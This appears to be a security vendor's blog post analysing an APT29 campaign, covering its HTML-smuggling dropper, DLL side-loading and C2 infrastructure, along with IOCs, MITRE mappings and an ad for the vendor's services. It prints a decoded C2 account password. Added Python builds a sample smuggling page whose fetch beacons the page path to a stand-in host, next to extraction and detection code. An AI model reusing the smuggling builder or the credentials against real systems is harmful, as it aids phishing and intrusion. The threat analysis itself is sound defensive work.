[Pipeline Research] Russian APT29 Uses Pakistani Site to Target Europe

In the ever-evolving landscape of cyber threats, advanced persistent threats (APTs) continue to pose significant challenges to global cybersecurity. One such notorious APT group is APT29, also known as "Cozy Bear". Known for its sophisticated tactics and suspected ties to Russian intelligence agencies, APT29 has recently been making headlines for a new and cunning strategy: leveraging a Pakistani website to target Europe.

This blog explores how the Pipeline Research team discovered the intriguing tactics and history of APT29, shedding light on its operations, motivations, and potential implications of its latest move. Join us as we delve into the enigmatic world of APT29 and analyze how their actions have raised new concerns about cybersecurity on an international scale.

How APT29 Group Evolved

APT29 is a suspected Russian threat group, active since 2008, linked to the Russian government's Foreign Intelligence Service (SVR). In 2015, they gained initial access to the Pentagon's network via phishing and used the Hammertoss technique, which relies on Twitter accounts for C2 communication.

In addition, APT29 breached Democratic National Committee servers in 2016, compromised three EU national affairs ministries and a Washington D.C.-based embassy of an EU nation state in 2019, and distributed the SUNBURST malware targeting SolarWinds Orion software in 2020. APT29 usually targets the technology, healthcare, education, government, energy, and finance sectors in the US and Europe.

Recently, Pipeline, Inc. observed a threat campaign possibly linked to APT29 that used RedCap malware. Interestingly, the malware script communicates with a Pakistani domain, which appears to have been compromised by APT29. The infection chain starts with an HTML page that downloads a ZIP file containing an HTA file.

When the HTA file is executed, it writes one EXE file, two DLL files, and one PDF file, and then runs the EXE. The EXE is even a Microsoft-signed binary. Once running, the malware carries out further malicious activity by connecting to its C2 domains; this time, APT29 is using AWS. The high-level infection chain is visualized in the figure below.

Technical Investigation

APT29 starts the operation with an HTML file that contains a very long JavaScript array:

The array is then passed to the Uint8Array() constructor to create a Uint8Array object, which is saved as a ZIP file named ‘Invitation_Farewell_DE_EMB[.]zip’. Finally, the HTML file sends a GET request to a Pakistani domain carrying the value of window.location.pathname, using the code below:
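As an added illustration of the smuggling mechanism just described (this is not code from the page or from the sample), the following Python first constructs a page of the same shape, then shows how an analyst can statically recover the embedded ZIP from the Uint8Array literal and flag the pathname beacon. The HTA file name inside the ZIP, the beacon URL and the placeholder HTA content are constructed assumptions.

```python
import io
import re
import zipfile

ZIP_MAGIC = b"PK\x03\x04"   # local file header that starts every non-empty ZIP
ARRAY_RE = re.compile(r"new\s+Uint8Array\s*\(\s*\[([\d\s,]+)\]\s*\)")


def build_sample_html() -> str:
    """Construct a page shaped like the smuggling HTML: a ZIP (holding a placeholder
    HTA, name assumed) expanded into a JavaScript byte array, plus a pathname beacon."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Invitation_Farewell_DE_EMB.hta", "<script>/* placeholder */</script>")
    arr = ",".join(str(b) for b in buf.getvalue())
    return (
        "<html><body><script>\n"
        f"var data = new Uint8Array([{arr}]);\n"
        "var blob = new Blob([data], {type: 'application/zip'});\n"
        "fetch('https://beacon.example.invalid/idx.php?p=' + window.location.pathname);\n"
        "</script></body></html>"
    )


def extract_smuggled_zip(html: str):
    """Statically recover a ZIP hidden in a Uint8Array literal. Returns None when the
    page has no such array or the bytes are not a ZIP; otherwise a summary dict."""
    m = ARRAY_RE.search(html)
    if not m:
        return None
    try:
        raw = bytes(int(n) for n in m.group(1).split(",") if n.strip())
    except ValueError:          # an element outside 0..255 is not a byte array
        return None
    if not raw.startswith(ZIP_MAGIC):
        return None
    names = zipfile.ZipFile(io.BytesIO(raw)).namelist()
    return {
        "size": len(raw),
        "names": names,
        "has_hta": any(n.lower().endswith(".hta") for n in names),
        # the GET that leaks the landing URL path to the operator's server
        "beacon_pathname": "window.location.pathname" in html,
    }
```

Running the extractor over a real sample lets the recovered ZIP be unpacked and the HTA analyzed without ever rendering the page in a browser.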

The generated ZIP file contains an HTA file, which also holds a very long JavaScript array. A for loop rebuilds the array's value, which is then saved as a DLL file named ‘mso.dll’ by ActiveXObject in the 'C:\windows\tasks' folder, using the code below:

The second DLL file is created using the same technique. Then an EXE file named ‘msoev[.]exe’ is created by ActiveXObject and saved in the 'C:\windows\tasks' folder. Next, a single-page PDF file is generated in which APT29 pretends to be ‘The Embassy of Germany’ in order to target European companies. The PDF looks like this:

Finally, VBScript is used to execute the EXE via WScript.Shell, as shown below:

The EXE is a Microsoft-Signed Binary!

The EXE file name ‘msoEV.exe’ belongs to a legitimate file that is part of Microsoft Office Professional Plus 2016, developed by Microsoft Corporation, and the generated EXE is a binary signed by Microsoft. Here is the certificate of the EXE:

Even the two DLL files written by the HTA file are saved under the names of DLLs used by Microsoft (although their contents are altered and malicious). It looks like APT29 is using a DLL side-loading-like technique.

After execution, it communicates with the following C2 domain:

toyy[.]zulipchat[.]com

That communication uses a Basic authorization header. After decoding it, we found the following username and password:

User: gabs-bot@toyy[.]zulipchat[.]com

Pass: xJZf8jaqwX54HWaliXfm4u2bMWCzNoLz

High-Level TTPs

We are still investigating and tracking the activity. Here we provide a high-level summary of the malware's TTPs:

  • This time, APT29 uses the Microsoft-signed binary ‘msoEV.exe’.
  • The malware is written to the ‘C:\windows\tasks’ folder for persistence.
  • The malware mostly collects user and system information.
  • The malware performs process injection so that a system process makes the network connection.
  • The malware connects to 'ec2-52-202-201-139[.]compute-1[.]amazonaws[.]com', which indicates that APT29 is using an AWS EC2 instance.
  • The attack is geo-based: the country code is checked in the Windows Registry.
  • It also downloads two files from the ‘hxxps[://]crt[.]sectigo[.]com/’ domain.
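The following Python, added here and not part of the original report, turns the dropper and side-loading TTPs above into a detection pass over Sysmon-style events (FileCreate, ProcessCreate, ImageLoad). The events, their field names and the set of watched directories are constructed assumptions modelling the chain, not real telemetry.

```python
import ntpath

# Constructed Sysmon-style events (IDs 11 = FileCreate, 1 = ProcessCreate, 7 = ImageLoad)
# modelling the chain: mshta.exe drops mso.dll and msoev.exe into C:\windows\tasks, then the
# signed msoev.exe starts and loads the unsigned mso.dll sitting beside it.
SAMPLE_EVENTS = [
    {"id": 11, "Image": r"C:\Windows\System32\mshta.exe", "TargetFilename": r"C:\windows\tasks\mso.dll"},
    {"id": 11, "Image": r"C:\Windows\System32\mshta.exe", "TargetFilename": r"C:\windows\tasks\msoev.exe"},
    {"id": 11, "Image": r"C:\Windows\System32\mshta.exe", "TargetFilename": r"C:\Users\u\invite.pdf"},
    {"id": 1, "Image": r"C:\windows\tasks\msoev.exe", "ParentImage": r"C:\Windows\System32\mshta.exe"},
    {"id": 7, "Image": r"C:\windows\tasks\msoev.exe", "ImageLoaded": r"C:\windows\tasks\mso.dll", "Signed": False},
    # Benign control: the real Office msoev.exe launched normally and loading a signed DLL
    {"id": 1, "Image": r"C:\Program Files\Microsoft Office\root\Office16\msoev.exe", "ParentImage": r"C:\Windows\explorer.exe"},
    {"id": 7, "Image": r"C:\Program Files\Microsoft Office\root\Office16\msoev.exe",
     "ImageLoaded": r"C:\Program Files\Microsoft Office\root\Office16\mso.dll", "Signed": True},
]

# Assumed user-writable directories under C:\Windows worth watching (the report names tasks)
WATCHED_DIRS = (r"c:\windows\tasks", r"c:\windows\temp")
SYSTEM32 = (r"c:\windows\system32",)
EXEC_EXT = (".exe", ".dll")


def in_dir(path: str, dirs) -> bool:
    return any(path.lower().startswith(d + "\\") for d in dirs)


def detect(events):
    """Return (rule_name, path) tuples for events matching the chain's TTPs."""
    alerts = []
    for e in events:
        img = e["Image"].lower()
        if e["id"] == 11:
            target = e["TargetFilename"]
            # Rule 1: an HTA host writing a PE file into a watched directory
            if img.endswith("\\mshta.exe") and target.lower().endswith(EXEC_EXT) and in_dir(target, WATCHED_DIRS):
                alerts.append(("hta_drops_executable", target))
        elif e["id"] == 1:
            # Rule 2: any process image executing out of a watched directory
            if in_dir(e["Image"], WATCHED_DIRS):
                alerts.append(("exec_from_writable_windows_dir", e["Image"]))
        elif e["id"] == 7:
            # Rule 3: unsigned DLL loaded from the host EXE's own directory, outside System32
            same_dir = ntpath.dirname(e["ImageLoaded"]).lower() == ntpath.dirname(img)
            if not e["Signed"] and same_dir and not in_dir(img, SYSTEM32):
                alerts.append(("possible_dll_sideload", e["ImageLoaded"]))
    return alerts
```

The benign Office launch in the sample produces no alert, which is the check to keep when tuning rule 3 against hosts that legitimately load DLLs from their own directory.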

Attribution

When the RedCap malware was detected, the threat actor initially appeared to be APT34, as Trend Micro published a report in February 2023 linking APT34 to RedCap malware activity. However, the TTPs we found later differed somewhat and were related to APT29. Cluster25 has also linked the C2 communication with the domain 'toyy[.]zulipchat[.]com' to APT29 (details).

IOC List

C2: hxxps[://]sgrhf[.]org[.]pk/wp-content/idx[.]php

C2: ec2-52-202-201-139[.]compute-1[.]amazonaws[.]com

C2: toyy[.]zulipchat[.]com

Email Address: gabs-bot@toyy[.]zulipchat[.]com

MITRE ATT&CK

T1591: Gather Victim Org Information
T1585: Establish Accounts
T1588: Obtain Capabilities
T1608: Stage Capabilities
T1566: Phishing
T1083: File and Directory Discovery
T1217: Browser Information Discovery
T1012: Query Registry
T1614: System Location Discovery

Conclusion

The recent threat campaign possibly linked to APT29 showcases the group's continued sophistication and adaptability in carrying out cyber espionage activities.

Leveraging a Pakistani domain, APT29 has employed an intricate infection chain, utilizing legitimate Microsoft-signed binaries and DLL side loading techniques to remain undetected. Their choice to communicate with a Zulip chat domain hosted on AWS indicates a strategic shift in their tactics, making attribution and detection more challenging.

The attack's geo-based targeting, particularly towards European entities, raises concerns about the group's intent and the potential geopolitical implications. While attribution in the cyber realm can be complex, the identified TTPs and C2 communication patterns point to APT29's involvement, differentiating it from previous attributions to other threat actors.

How Pipeline Can Help You

As the threat landscape continues to evolve, it becomes imperative for organizations to remain vigilant against advanced cyber adversaries like APT29. Pipeline, Inc., a leading cybersecurity solutions provider, offers a range of services and tools to help you strengthen your defenses and protect against sophisticated attacks.

  1. Threat Intelligence and Analysis: Pipeline's experts monitor and analyze the latest threat intelligence to provide real-time insights into emerging threats, including those associated with APT29. This enables proactive defense and timely response to potential attacks.
  2. Incident Response and Forensics: In the event of a cyber incident, Pipeline's experienced incident response team can rapidly mobilize to investigate, contain, and mitigate the impact of the breach. Our digital forensics capabilities help identify the attack's scope and facilitate the recovery process.
  3. Managed Detection and Response (MDR): With our MDR services, organizations can outsource their cybersecurity monitoring to Pipeline's dedicated team. We use advanced threat detection tools and 24/7 monitoring to identify and respond to potential threats effectively.
  4. Security Assessments and Penetration Testing: Pipeline's comprehensive security assessments and penetration testing services help identify vulnerabilities and weaknesses in your infrastructure, applications, and personnel. This empowers you to proactively address potential entry points for attackers.
  5. Security Awareness Training: Human error remains a common entry point for cyber attackers. Pipeline provides tailored security awareness training programs to educate your employees on best practices, reducing the risk of successful phishing and social engineering attacks.
  6. Threat Hunting: Our proactive threat hunting services allow us to search for signs of malicious activity that may have evaded traditional security measures. This proactive approach enhances the likelihood of early threat detection and containment.


At Pipeline, we understand the dynamic nature of cyber threats and the critical importance of safeguarding your organization's assets and reputation. With our cutting-edge solutions and expertise, you can stay ahead of APT29 and other sophisticated threat actors, ensuring a resilient and secure cyber environment for your business.

Contact us today to discuss how Pipeline can tailor a comprehensive cybersecurity strategy to meet your organization's specific needs and challenges. Safeguard your digital assets with confidence and stay one step ahead of the ever-evolving cyber threats.